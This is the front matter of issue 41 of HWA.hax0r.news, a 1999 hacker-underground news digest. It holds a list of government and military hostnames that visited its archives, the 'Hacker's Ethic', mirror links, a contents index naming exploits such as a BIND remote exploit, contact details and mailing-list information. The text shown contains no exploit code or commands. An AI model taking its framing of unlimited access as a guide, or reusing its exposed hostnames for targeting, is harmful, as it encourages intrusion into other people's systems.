Copy Link
Add to Bookmark
Report
hwa-hn41
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 41 Volume 1 1999 *Nov 7th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
* This issue covers Oct 31st to Nov 7th but was released on Nov 14th
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!
http://www.csoft.net/~hwa
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
The Hacker's Ethic
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
A Comment on FORMATTING:
Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
New mirror sites
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #41
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=--------------------------------------------------------------------------=
Issue #41
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
`ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Fix Available For Very Powerful IIS Exploit .....................
04.0 .. ULG Defaces Associated Press Web Site ...........................
05.0 .. Jane's To Host Cyber Terrorism Conference .......................
06.0 .. Trust Site Solution Released ....................................
07.0 .. Hacker or Cracker or Neither. Which Word to Use? ................
08.0 .. New Virus Discovered in London ..................................
09.0 .. Krystalia, In Memorium ..........................................
10.0 .. RealNetworks Changes Privacy Policy Amid Controversy ............
11.0 .. JTF-CND Runs CyberWar Simulation ................................
12.0 .. State Y2K Data Vulnerable .......................................
13.0 .. Clinton Privacy Plan: Is it Enough? .............................
14.0 .. Tempest Laws Reviewed ...........................................
15.0 .. Russians Seize Nuclear Expert's Computer ........................
16.0 .. Sir Dystic and Kevin Poulsen to Speak ...........................
17.0 .. Invisible KeyLogger97 ...........................................
18.0 .. Hoax: Gov-boi Killed in Car Accident (not).......................
19.0 .. Australia Admits to Echelon .....................................
20.0 .. DVD Copy Protection Broken ......................................
21.0 .. Optus in Australia Compromised ..................................
22.0 .. Romanian Finance Ministry Hit ...................................
23.0 .. Reuters News Database Compromised ...............................
24.0 .. Taiwan Vulnerable to Cyber Attack ...............................
25.0 .. 30,000 Virus Threats Received by Authorities ....................
26.0 .. Stupid User Mistakes (are a) Bigger Problem than Viruses ........
27.0 .. Echelon Education Website Launched ..............................
28.0 .. FTC Says Screw You and Your Privacy .............................
29.0 .. ParseTV to Adopt New Format .....................................
30.0 .. Meridian I hacking by BL4CKM1LK teleph0nics......................
31.0 .. Adobe Fingers EBay Pirates ......................................
32.0 .. India, Syria, Iran Have Offensive Cyberwar Abilities ............
33.0 .. Singapore Launches Probe Into Defacement ........................
34.0 .. Military Sites Invaded ..........................................
35.0 .. Emergency FidNet Funding Canceled ...............................
36.0 .. Cyberattacks Against DOD up 300 Percent .........................
37.0 .. White House Says US Vulnerable to Cyber Attack ..................
38.0 .. Russia Withholding Information on Computer Attacks ..............
39.0 .. Who is Richard Smith? ...........................................
40.0 .. Federal Guidelines for Searching and Seizing Computers ..........
41.0 .. Canadian Defense Site Defaced ...................................
42.0 .. Defacement of South Africa Statistics Site Investigated .........
43.0 .. BT Network Administation/SYSTEM X/OMC network ops by Hybrid......
44.0 .. Defeating the Caller ID system by Hybrid.........................
45.0 .. A buffer overflow exists on the VirusWall smtp gateway...........
46.0 .. The Xnews guid...................................................
47.0 .. BUFFER OVERFLOW IN IMG VIEWER....................................
48.0 .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability
49.0 .. RFP9906 - RFPoison...............................................
50.0 .. Realnetworks server buffer overflow exploit......................
51.0 .. NT Print spooler vulnerability...................................
52.0 .. Bind remote exploit (ADM)........................................
53.0 .. Security Focus Newsletter #13....................................
=-------------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Websites;
sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="Link</a">http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
